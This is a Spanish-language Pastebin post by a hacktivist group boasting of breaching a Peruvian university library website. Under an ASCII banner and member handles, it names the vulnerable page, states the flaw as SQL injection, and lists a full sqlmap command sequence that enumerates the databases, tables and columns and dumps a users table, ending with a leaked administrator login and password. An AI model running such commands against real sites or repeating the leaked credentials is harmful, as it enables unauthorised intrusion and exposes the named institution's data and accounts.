Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hola, hace tiempo había leído que esta Universidad era una de las mejores de Perú, pero sin embargo no lo es, aunque no lo crean tiene las mismas vulnerabilidades que tienen todas las Universidades de Perú, la cual permite obtener toda su base de datos con un simple bug...
- Bueno, sin mas que decir...
- ___________ .__.__
- \_ _____/____ |__| |
- | __) \__ \ | | |
- | \ / __ \| | |__
- \___ / (____ /__|____/
- \/ \/
- _________ .__ __
- / _____/ ____ ____ __ _________|__|/ |_ ___.__.
- \_____ \_/ __ \_/ ___\| | \_ __ \ \ __< | |
- / \ ___/\ \___| | /| | \/ || | \___ |
- /_______ /\___ >\___ >____/ |__| |__||__| / ____|
- \/ \/ \/ \/
- ___________
- \__ ___/___ _____ _____
- | |_/ __ \\__ \ / \
- | |\ ___/ / __ \| Y Y \
- |____| \___ >____ /__|_| /
- \/ \/ \/
- ==========================================================
- HACKED :P
- || Government Of Perú | Sistema de Bibliotecas USMP ||
- #ANTISEC
- Integrantes: @Zer0P4nik @D3str0yers @McST0NE @DeLaGhezzy90 @MaDx404 @_h4v0k
- ===========================================================
- Sitio Web: http://www.sibus.usmp.edu.pe
- Link Vulnerable: http://www.sibus.usmp.edu.pe/servicio.php?cat=1
- Vulnerabilidad: SQL Injection
- Base de datos desde el SLQMAP:
- ./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 --dbs
- available databases [4]:
- [*] biblioteca
- [*] information_schema
- [*] mysql
- [*] test
- ./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca --tables
- Database: biblioteca
- [28 tables]
- +-----------------------+
- | adq_categoria |
- | adquisicion |
- | biblioteca_virtual |
- | carne |
- | directorio |
- | docente_inscripcion |
- | ebsco_inscripcion |
- | egresado_inscripcion |
- | enlace |
- | galeria |
- | galeria_fotos |
- | guia_manual |
- | imagen |
- | info_general |
- | infonauta |
- | logo |
- | martino |
- | novedad |
- | personal |
- | personal_foto |
- | publicaciones |
- | reglamento |
- | revista |
- | revista_numero |
- | servicio |
- | temporada |
- | usuario |
- | visitante_inscripcion |
- +-----------------------+
- ./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca -T usuario --columns
- Database: biblioteca
- Table: usuario
- [2 columns]
- +----------+-------------+
- | Column | Type |
- +----------+-------------+
- | login | varchar(50) |
- | password | varchar(50) |
- +----------+-------------+
- ./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca -T usuario -C login,password --dump
- Database: biblioteca
- Table: usuario
- [1 entry]
- +-------+----------------+
- | login | password |
- +-------+----------------+
- | admin | u5mpb1bl10tec@ |
- +-------+----------------+
- Al parecer no es la mejor que digamos :)
- Un saludo a @AnonymousPeru :D
- Gr33tz T0: @LegionJJ @Keygen__0x7 @_AlexSw @JJSpartan =D
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement